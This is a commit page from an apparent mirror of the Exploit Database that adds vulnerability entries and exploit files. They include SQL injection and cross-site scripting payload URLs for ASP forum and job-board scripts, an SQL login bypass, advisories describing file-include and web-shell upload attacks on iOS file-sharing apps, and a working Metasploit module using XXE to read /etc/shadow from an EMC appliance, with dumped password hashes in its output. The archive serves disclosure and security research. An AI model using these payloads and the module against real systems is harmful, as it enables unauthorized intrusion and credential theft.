bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 04_02_2014

Browse source
This commit is contained in:
Offensive Security 2014-04-02 04:33:32 +00:00
parent b4bcf9b61d
commit 5bc4346f84
21 changed files with 1209 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

20
files.csv
View file

@ -29379,3 +29379,23 @@ id,file,description,date,author,platform,type,port
32615,platforms/php/webapps/32615.txt,"Softbiz Classifieds Script lostpassword.php msg Parameter XSS",2008-12-01,Pouya_Server,php,webapps,0
32616,platforms/php/webapps/32616.txt,"Softbiz Classifieds Script admin/adminhome.php msg Parameter XSS",2008-12-01,Pouya_Server,php,webapps,0
32617,platforms/php/webapps/32617.txt,"Softbiz Classifieds Script admin/index.php msg Parameter XSS",2008-12-01,Pouya_Server,php,webapps,0
32618,platforms/php/remote/32618.txt,"plexusCMS 0.5 - XSS Remote Shell Exploit & Credentials Leak",2014-03-31,neglomaniac,php,remote,0
32619,platforms/hardware/webapps/32619.txt,"PhotoWIFI Lite 1.0 iOS - Multiple Vulnerabilities",2014-03-31,Vulnerability-Lab,hardware,webapps,52789
32620,platforms/hardware/webapps/32620.txt,"Vanctech File Commander 1.1 iOS - Multiple Vulnerabilities",2014-03-31,Vulnerability-Lab,hardware,webapps,8080
32621,platforms/php/remote/32621.rb,"SePortal SQLi - Remote Code Execution",2014-03-31,metasploit,php,remote,80
32622,platforms/php/webapps/32622.txt,"Wordpress Ajax Pagination Plugin 1.1 - Local File Inclusion",2014-03-31,"Glyn Wintle",php,webapps,80
32623,platforms/multiple/webapps/32623.txt,"EMC Cloud Tiering Appliance v10.0 Unauthenticated XXE Arbitrary File Read",2014-03-31,"Brandon Perry",multiple,webapps,0
32624,platforms/php/webapps/32624.txt,"PHP JOBWEBSITE PRO siteadmin/forgot.php adname Parameter SQL Injection",2008-12-01,Pouya_Server,php,webapps,0
32625,platforms/php/webapps/32625.txt,"PHP JOBWEBSITE PRO siteadmin/forgot.php Multiple Parameter XSS",2008-12-01,Pouya_Server,php,webapps,0
32626,platforms/asp/webapps/32626.txt,"ASP Forum Script messages.asp message_id Parameter SQL Injection",2008-12-01,Pouya_Server,asp,webapps,0
32627,platforms/php/webapps/32627.txt,"ASP Forum Script new_message.asp forum_id Parameter XSS",2008-12-01,Pouya_Server,php,webapps,0
32628,platforms/asp/webapps/32628.txt,"ASP Forum Script messages.asp forum_id Parameter XSS",2008-12-01,Pouya_Server,asp,webapps,0
32629,platforms/asp/webapps/32629.txt,"ASP Forum Script default.asp Query String XSS",2008-12-01,Pouya_Server,asp,webapps,0
32630,platforms/asp/webapps/32630.txt,"Pre ASP Job Board 'emp_login.asp' Cross Site Scripting Vulnerability",2008-12-01,Pouya_Server,asp,webapps,0
32631,platforms/multiple/webapps/32631.txt,"IBM Rational ClearCase 7/8 Cross Site Scripting Vulnerability",2008-12-01,IBM,multiple,webapps,0
32632,platforms/php/webapps/32632.php,"Fantastico 'index.php' Local File Include Vulnerability",2008-12-02,Super-Crystal,php,webapps,0
32633,platforms/php/webapps/32633.txt,"Z1Exchange 1.0 showads.php id Parameter SQL Injection",2008-12-02,Pouya_Server,php,webapps,0
32634,platforms/php/webapps/32634.txt,"Z1Exchange 1.0 showads.php id Parameter XSS",2008-12-02,Pouya_Server,php,webapps,0
32635,platforms/asp/webapps/32635.txt,"Jbook SQL Injection Vulnerability",2008-12-02,Pouya_Server,asp,webapps,0
32636,platforms/php/webapps/32636.txt,"Orkut Clone profile_social.php id Parameter SQL Injection",2008-12-02,d3b4g,php,webapps,0
32637,platforms/php/webapps/32637.txt,"Orkut Clone profile_social.php id Parameter XSS",2008-12-02,d3b4g,php,webapps,0

Can't render this file because it is too large.

7
platforms/asp/webapps/32626.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/32571/info
ASP Forum Script is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/[Path]/messages.asp?forum_id=3&message_id=[SQL]

7
platforms/asp/webapps/32628.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/32571/info
ASP Forum Script is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/[Path]/messages.asp?forum_id=>'><ScRiPt%20%0a%0d>alert(1369)%3B</ScRiPt>&message_id=197

7
platforms/asp/webapps/32629.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/32571/info
ASP Forum Script is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/[Path]/default.asp?>"'><ScRiPt>alert(1369)</ScRiPt>

9
platforms/asp/webapps/32630.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/32572/info
Pre ASP Job Board is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
All versions are considered vulnerable.
http://www.example.com/[Path]/Employee/emp_login.asp?msg=%3Cimg%20dynsrc%3D%22JaVaScRiPt:alert%281369%29%3B%22%3E

10
platforms/asp/webapps/32635.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/32599/info
Jbook is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
The following example input is available:
User:admin
pass:' or '

267
platforms/hardware/webapps/32619.txt Executable file
View file

@ -0,0 +1,267 @@
Document Title:
===============
PhotoWIFI Lite v1.0 iOS - Multiple Web Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1239
Release Date:
=============
2014-03-27
Vulnerability Laboratory ID (VL-ID):
====================================
1239
Common Vulnerability Scoring System:
====================================
6.7
Product & Service Introduction:
===============================
Share photos and files through WIFI. This app will let you transfer images easily in both directions, iPhone-to-Mac and Mac-to-iPhone.
This app runs on iPhone, iPad and iPod, and you can share with a Mac or a PC as well. Photo Uploading to Facebook is also possible.
(Copy of the Homepage: https://itunes.apple.com/us/app/wifi-photos-files-transfer/id436339474 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple vulnerabilities in the official PhotoWIFI Lite or WIFI Photo and Files Transfer v1.0 iOS mobile web-application.
Vulnerability Disclosure Timeline:
==================================
2014-03-27: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
TapCoder
Product: PhotoWIFI Lite & PRO - iOS Mobile Web Application 1.0
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
1.1
A local file include web vulnerability has been discovered in the official PhotoWIFI Lite or WIFI Photo and Files Transfer v1.0 iOS mobile web-application.
A file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system specific path commands
to compromise the web-application or mobile device.
The local vulnerability is located in the `filename` value of the `Upload File` module. Remote attackers are able to inject own files with
malicious `filename` value in the upload POST method request to compromise the mobile web-application. The attack vector is persistent and
the request method to inject is POST. The local file/path include execution occcurs in the index file dir listing. The security risk of the
local file include web vulnerability is estimated as high(+) with a cvss (common vulnerability scoring system) count of 6.4(+)|(-)6.5.
Exploitation of the local file include web vulnerability requires no user interaction but a privileged web-application user account with low user
auth. Successful exploitation of the local file include web vulnerability results in mobile application or connected device component compromise.
Request Method(s):
[+] [POST]
Vulnerable Module(s):
[+] Upload File > Submit
Vulnerable Parameter(s):
[+] filename
Affected Module(s):
[+] Index File Dir List (http://localhost:85***/)
1.2
An arbitrary file upload web vulnerability has been discovered in the official PhotoWIFI Lite or WIFI Photo and Files Transfer v1.0 iOS mobile web-application.
The arbitrary file upload issue allows remote attackers to upload files with multiple extensions to bypass the web-server or system validation.
The vulnerability is located in the `Upload File` > submit module. Remote attackers are able to upload a php or js web-shells by renaming
the file with multiple extensions to bypass the file restriction mechanism. The attacker uploads for example a web-shell with the following name
and extension `ptest.jpg.html.php.js.aspx.jpg`. After the upload the attacker needs to open the file with the path value in the web application.
He deletes the .jpg file extension and can access the application with elevated executable access rights. To access the file with elevated
executable access rights the attacker needs to implement the local raw upload path of the application. The security risk of the arbitrary file
upload web vulnerability is estimated as high(+) with a cvss (common vulnerability scoring system) count of 6.6(+)|(-)6.7.
Exploitation of the arbitrary file upload web vulnerability requires no user interaction or privileged application user account with password.
Successful exploitation of the vulnerability results in unauthorized file access because of a compromise after the upload of web-shells.
Request Method(s):
[+] [POST]
Vulnerable Module(s):
[+] Upload File > Submit
Vulnerable Parameter(s):
[+] filename (multiple extensions)
Affected Module(s):
[+] Index File Dir List (http://localhost:85***/)
1.3
A local command/path injection web vulnerability has been discovered in the official PhotoWIFI Lite or WIFI Photo and Files Transfer v1.0 iOS mobile web-application.
The vulnerability allows to inject local commands via vulnerable system values to compromise the apple mobile iOS application.
The vulnerability is located in the vulnerable `devicename` value of the wireless transfer app index header location module.
Local attackers with physical device access are able to manipulate the iOS `devicename` to compromise the affected header
location context in the file dir index list. The execution of the injected command/path request occurs in the all wifi
interface sites with implemented devicename in the header location. The request method to inject system specific commands via
the vulnerable devicename value is a local sync via (apple - ios) device.The security risk of the command/path inject
vulnerability is estimated as high(-) with a cvss (common vulnerability scoring system) count of 6.6(-).
Exploitation of the command/path inject vulnerability requires a local low privileged iOS device account with restricted access
and no direct user interaction. Successful exploitation of the vulnerability results unauthorized execution of system specific
commands or unauthorized path requests.
Request Method(s):
[+] [SYNC]
Vulnerable Parameter(s):
[+] devicename
Affected Module(s):
[+] Header Location - Index File Dir List (http://localhost:85***/)
Proof of Concept (PoC):
=======================
1.1
The local file include web vulnerability can be exploited by local attackers with low user interaction and with low privileged web-interface account.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
PoC: Index File Dir Listing < filename
<p>Pick an image on iPhone (or iPad) and click: <a href="">Refresh</a><br></p><table border="0" cellpadding="5"
cellspacing="0"><tbody><tr bgcolor="#999999"><td><a href="<./[LOCAL FILE INCLUDE VULNERABILITY!]">.png"><./[LOCAL FILE INCLUDE VULNERABILITY!]">.png</a></td>
--- PoC Session Logs [POST] ---
Status: 200[OK]
POST http://localhost:52789/ Load Flags[VALIDATE_ALWAYS LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Gr??e des Inhalts[unknown] Mime Type[unknown]
Request Header:
Host[localhost:52789]
User-Agent
[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
Accept-Encoding[gzip,
deflate]
Referer[http://localhost:52789/]
POST-Daten:
POST_DATA[-----------------------------55143247013257
Content-Disposition: form-data; name="file"; filename="./[LOCAL FILE INCLUDE VULNERABILITY!]".png"
Content-Type: image/png
1.2
The arbitrary file upload web vulnerability can be exploited by local attackers without user interaction or privileged application user account.
For security demonstration or to reproduce the file upload web vulnerability follow the provided information and steps below to continue.
PoC: Index File Dir Listing < filename
<p>Pick an image on iPhone (or iPad) and click: <a href="">Refresh</a><br></p><table border="0" cellpadding="5"
cellspacing="0"><tbody><tr bgcolor="#999999"><td><a href="test.jpg.html.php.asp.html.jpg[ARBITRARY FILE UPLOAD VULNERABILITY!]">
test.jpg.html.php.asp.html.jpg.png[ARBITRARY FILE UPLOAD VULNERABILITY!]</a></td>
--- PoC Session Logs [POST] ---
Status: 200[OK]
POST http://localhost:52789/ Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Gr??e des Inhalts[1009] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:52789]
User-Agent
[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
Accept-Encoding[gzip,
deflate]
Referer[http://localhost:52789/]
Connection[keep-alive]
POST-Daten:
POST_DATA[-----------------------------65831034010479
Content-Disposition: form-data; name="file"; filename="test.jpg.html.php.asp.html.jpg[ARBITRARY FILE UPLOAD VULNERABILITY!]"
Content-Type: image/jpeg
1.3
The command inject web vulnerability can be exploited by local attackers with low user interaction and low privileged web-application user account.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
PoC: Index File Dir Listing > Header Location > Devicename
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Files from IPhone 360*?337[COMMAND INJECTION VULNERABILITY VIA DEVICENAME!]</title><style>html
{background-color:#eeeeee} body { background-color:#FFFFFF; font-family:Tahoma,Arial,Helvetica,sans-serif; font-size:18x; margin-left:5%;
margin-right:5%; border:3px groove #006600; padding:15px; } </style></head><body><h1>Files from IPhone 360*?337[COMMAND INJECTION VULNERABILITY VIA DEVICENAME!]</h1>
Security Risk:
==============
1.1
The security risk of the local file include web vulnerability is estimated as high.
1.2
The security risk of the arbitrary file upload web vulnerability is estimated as high.
1.3
The security risk of the local command inject web vulnerability via sync is estimated as medium(+)|(-)high.
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright ? 2014 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com

303
platforms/hardware/webapps/32620.txt Executable file
View file

@ -0,0 +1,303 @@
Document Title:
===============
Vanctech File Commander 1.1 iOS - Multiple Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1235
Release Date:
=============
2014-03-28
Vulnerability Laboratory ID (VL-ID):
====================================
1235
Common Vulnerability Scoring System:
====================================
7.3
Product & Service Introduction:
===============================
This is an app which can change the way you use your iphone/itouch. With this app , when you try to read a document or listen to music
or even you want to watch some video,You don`t have to change the apps round by round.You can deal with them in one app with simple operation.
And we can even provide the wifi share, you can share the files whatever you like with you friends or your PC/MAC. And of course you can send
the files in your PC/MAC to your iphone/itouch. You can enjoy your files without change pages anywhere anytime you want.
(Copy of the Homepage: https://itunes.apple.com/de/app/file-commander/id484450911 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple high severity vulnerabilities in the official Vanctech File Commander v1.1 iOS mobile web-application.
Vulnerability Disclosure Timeline:
==================================
2014-03-28: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Shanghai Fan Cheng Software Ltd
Product: File Commander - iOS Mobile Web Application 1.1
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
1.1
A local file include web vulnerability has been discovered in the official Vanctech File Commander v1.1 iOS mobile web-application.
A file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system specific path commands
to compromise the web-application or mobile device.
The web vulnerability is located in the `filename` value of the `upload` module POST methdo request. Remote attackers are able to inject own
files with a malicious `filename` value in the upload POST method request to compromise the mobile web-application. The attack vector is on
the application-side and the request method to inject is POST. The local file/path include execution occcurs in the index file commander
dir listing. The security risk of the local file include web vulnerability is estimated as high(+) with a cvss (common vulnerability scoring
system) count of 7.4(+)|(-)7.5.
Exploitation of the local file include web vulnerability requires no user interaction or a privileged mobile web-application user account.
Successful exploitation of the local file include web vulnerability results in mobile application or connected device component compromise.
Request Method(s):
[+] [POST]
Vulnerable Module(s):
[+] Select File > Upload
Vulnerable Parameter(s):
[+] filename
Affected Module(s):
[+] Index File Dir List (http://localhost:8080/)
1.2
An arbitrary file upload web vulnerability has been discovered in the official Vanctech File Commander v1.1 iOS mobile web-application.
The arbitrary file upload issue allows remote attackers to upload files with multiple extensions to bypass the web-server or system validation.
The vulnerability is located in the `select file` function of the upload resource module. Remote attackers are able to upload a php or js web-shells
by renaming the file with multiple extensions to bypass the file restriction mechanism. The attacker uploads for example a web-shell with the following
name and extension `ptest.png.html.php.js.aspx.png`. After the upload the attacker needs to open the file with the path value in the web application.
He deletes the .png file extension and can access the application with elevated executable access rights. The attack vector is on the application-side
of the vulnerable wifi interface service and the request method is POST. To access the file the attacker needs to request the public `./Download` path.
There are two ways to include local files. The first is to sync with a local user account at the affected device with the vulnerable software. The second
possibility is to access the wifi interface and upload (remote) the files in the local or public network. The security risk of the arbitrary file upload
web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 7.1(+)|(-)7.2.
Exploitation of the arbitrary file upload web vulnerability requires no user interaction or privileged application user account with password.
Successful exploitation of the vulnerability results in unauthorized file access because of a compromise after the upload of web-shells.
Request Method(s):
[+] [POST]
Vulnerable Module(s):
[+] Select File > Upload
Vulnerable Parameter(s):
[+] filename (multiple extensions)
Affected Module(s):
[+] Downloads File Dir (http://localhost:8080/files?x)
Proof of Concept (PoC):
=======================
1.1
The local file include web vulnerability can be exploited by local attackers without privileged web-application user account or user interaction.
For security demonstration or to reproduce the local web vulnerability follow the provided information and steps below to continue.
PoC:
http://localhost:8080/files?./[LOCAL FILE INCLUDE VULNERABILITY!]
http://localhost:8080/files/[UPLOAD PATH VALUE]/[LOCAL FILE INCLUDE VULNERABILITY!]
--- PoC Session Logs [POST] ---
12:01:20.676[96ms][total 96ms] Status: 302[Found]
POST http://localhost:8080/files Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Gr??e des Inhalts[67] Mime Type[text/html]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8080/]
Connection[keep-alive]
POST-Daten:
POST_DATA[-----------------------------245932080324620
Content-Disposition: form-data; name="newfile"; filename="2.png"
Content-Type: image/png
Source: File Management - Index
<table style="background-image: url('border-1.png');" border="0" cellpadding="0" cellspacing="0">
<tbody><tr><td height="1" width="5"> </td><td> </td><td width="5"> </td></tr>
<tr><td> </td><td align="center">
<table style="background-image: url('bg-1.png');" border="0" cellpadding="0" cellspacing="0" width="100%">
<thead>
<tr><th>Name</th><th>Size</th><th>Date Modified</th></tr>
</thead>
<tbody id="filelist">./[LOCAL FILE INCLUDE VULNERABILITY VIA FILENAME VALUE!];
</tbody>
</table></td><td> </td></tr>
<tr><td height="1"> </td><td> </td><td> </td></tr>
</tbody></table>
<table style="border-top:1px solid #ccc;" border="0" cellpadding="0" cellspacing="0" width="100%">
<tbody><tr><td height="20" align="center">Powered by Vanctech</td></tr></tbody></table></div>
PoC: Vulnerable Fil?e Item List JScript
<script type="text/javascript" charset="utf-8">
var now = new Date();
$.getJSON("/files?"+ now.toString(),
function(data){
var shadow = false;
$.each(data, function(i,item){
var trclass='';
if (shadow)
trclass= " class='shadow'";
encodeName = encodeURI(item.name).replace("'", "'");
$("<tr" + trclass + "><td><a href='/files/" + encodeName + "' class='file'>" + item.name + "</a></td> <td>" + item.size + "</td><td>" + item.modDate + "</td></tr>").appendTo("#filelist");
shadow = !shadow;
});
});
</script>
Reference(s):
http://localhost:8080/files/
1.2
The arbitrary file upload web vulnerability can be exploited by remote attackers without privileged application user account or user interaction.
For security demonstration or to reproduce the local web vulnerability follow the provided information and steps below to continue.
PoC: Upload Path (Download)
http://localhost:8080/Download/test.jpg.html.php.asp.html.jpg
http://localhost:8080/Download/[ARBITRARY FILE UPLOAD VULNERABILITY!]
--- PoC Session Logs [POST] ---
12:02:44.901[543ms][total 543ms] Status: 302[Found]
POST http://localhost:8080/files Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Gr??e des Inhalts[67] Mime Type[text/html]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8080/]
Connection[keep-alive]
POST-Daten:
POST_DATA[-----------------------------36532693528160
Content-Disposition: form-data; name="newfile"; filename="test.jpg.html.php.asp.html.jpg[ARBITRARY FILE UPLOAD VULNERABILITY!]"
Content-Type: image/jpeg
Source: File Management - Downloads
<table style="background-image: url('border-1.png');" border="0" cellpadding="0" cellspacing="0">
<tbody><tr><td height="1" width="5"> </td><td> </td><td width="5"> </td></tr>
<tr><td> </td><td align="center">
<table style="background-image: url('bg-1.png');" border="0" cellpadding="0" cellspacing="0" width="100%">
<thead>
<tr><th>Name</th><th>Size</th><th>Date Modified</th></tr>
</thead>
<tbody id="filelist">
[ARBITRARY FILE UPLOAD VULNERABILITY!]</tbody>
</table></td><td> </td></tr>
<tr><td height="1"> </td><td> </td><td> </td></tr>
</tbody></table>
<table style="border-top:1px solid #ccc;" border="0" cellpadding="0" cellspacing="0" width="100%">
<tbody><tr><td height="20" align="center">Powered by Vanctech</td></tr></tbody></table></div>
Reference(s):
http://localhost:8080/Download/
Solution - Fix & Patch:
=======================
1.1
The local file include web vulnerability can be patched by a secure parse and encode of the vulnerable filename value in the upload file POST method request.
Filter and encode also the filename output in the index js item script to prevent injection or code execution attacks in the name context listing.
1.2
Filter and restrict the file name validation on uploads to prevent arbitrary file upload attacks. Implement a secure own exception-handling to restrict
and disallow files with multiple extensions. Reset the executable rights for html and php codes in the little web-server settings config for /files.
Security Risk:
==============
1.1
The security risk of the local file include web vulnerability in the file commander interface is estimated as high.
1.2
The security risk of the arbitrary file upload web vulnerability in the file commander interface is estimated as high(+).
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright ? 2014 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com

136
platforms/multiple/webapps/32623.txt Executable file
View file

@ -0,0 +1,136 @@
EMC Cloud Tiering Appliance v10.0 Unauthed XXE
The following authentication request is susceptible to an XXE attack:
POST /api/login HTTP/1.1
Host: 172.31.16.99
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:26.0) Gecko/20100101 Firefox/26.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=12818F1AC5C744CF444B2683ABF6E8AC
Connection: keep-alive
Referer: https://172.31.16.99/UxFramework/UxFlashApplication.swf
Content-Type: application/x-www-form-urlencoded
Content-Length: 213
<Request>
<Username>root</Username>
<Password>114,97,105,110</Password>
</Request>
--------------------------------------------
The following metasploit module will exploit this to read an arbitrary file from the file system:
# This module requires Metasploit: http//metasploit.com/download
##
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'EMC CTA Unauthenticated XXE Arbitrary File Read',
'Description' => %q{
EMC CTA v10.0 is susceptible to an unauthenticated XXE attack
that allows an attacker to read arbitrary files from the file system
with the permissions of the root user.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Brandon Perry <bperry.volatile@gmail.com>', #metasploit module
],
'References' =>
[
],
'DisclosureDate' => 'Mar 31 2014'
))
register_options(
[
OptString.new('TARGETURI', [ true, "Base directory path", '/']),
OptString.new('FILEPATH', [true, "The filepath to read on the server", "/etc/shadow"]),
], self.class)
end
def run
pay = %Q{<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file://#{datastore['FILEPATH']}" >]>
<Request>
<Username>root</Username>
<Password>&xxe;</Password>
</Request>
}
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'api', 'login'),
'method' => 'POST',
'data' => pay
})
file = /For input string: "(.*)"/m.match(res.body)
file = file[1]
path = store_loot('emc.file', 'text/plain', datastore['RHOST'], file, datastore['FILEPATH'])
print_good("File saved to: " + path)
end
end
----------------------------------------------------------------
Quick run:
msf auxiliary(emc_cta_xxe) > show options
Module options (auxiliary/gather/emc_cta_xxe):
Name Current Setting Required Description
---- --------------- -------- -----------
FILEPATH /etc/shadow yes The filepath to read on the server
Proxies http:127.0.0.1:8080 no Use a proxy chain
RHOST 172.31.16.99 yes The target address
RPORT 443 yes The target port
TARGETURI / yes Base directory path
VHOST no HTTP server virtual host
msf auxiliary(emc_cta_xxe) > run
[+] File saved to: /home/bperry/.msf4/loot/20140331082903_default_172.31.16.99_emc.file_935159.txt
[*] Auxiliary module execution completed
msf auxiliary(emc_cta_xxe) > cat /home/bperry/.msf4/loot/20140331082903_default_172.31.16.99_emc.file_935159.txt
[*] exec: cat /home/bperry/.msf4/loot/20140331082903_default_172.31.16.99_emc.file_935159.txt
root:u4sA.C2vNqNF.:15913::::::
bin:*:15913:0:99999:0:0::
daemon:*:15913:0:99999:0:0::
lp:*:15913:0:99999:0:0::
mail:*:15913:0:99999:0:0::
news:*:15913:0:99999:0:0::
uucp:*:15913:0:99999:0:0::
man:*:15913:0:99999:0:0::
wwwrun:*:15913:0:99999:0:0::
ftp:*:15913:0:99999:0:0::
nobody:*:15913:0:99999:0:0::
messagebus:*:15913:0:99999:0:0::
polkituser:*:15913:0:99999:0:0::
haldaemon:*:15913:0:99999:0:0::
sshd:*:15913:0:99999:0:0::
uuidd:*:15913:0:99999:0:0::
postgres:*:15913:0:99999:0:0::
ntp:*:15913:0:99999:0:0::
suse-ncc:*:15913:0:99999:0:0::
super:u4sA.C2vNqNF.:15913:0:99999:0:0::
msf auxiliary(emc_cta_xxe) >

9
platforms/multiple/webapps/32631.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/32574/info
IBM Rational ClearCase is prone to a cross-site scripting vulnerability because the software fails to properly sanitize user-supplied input.
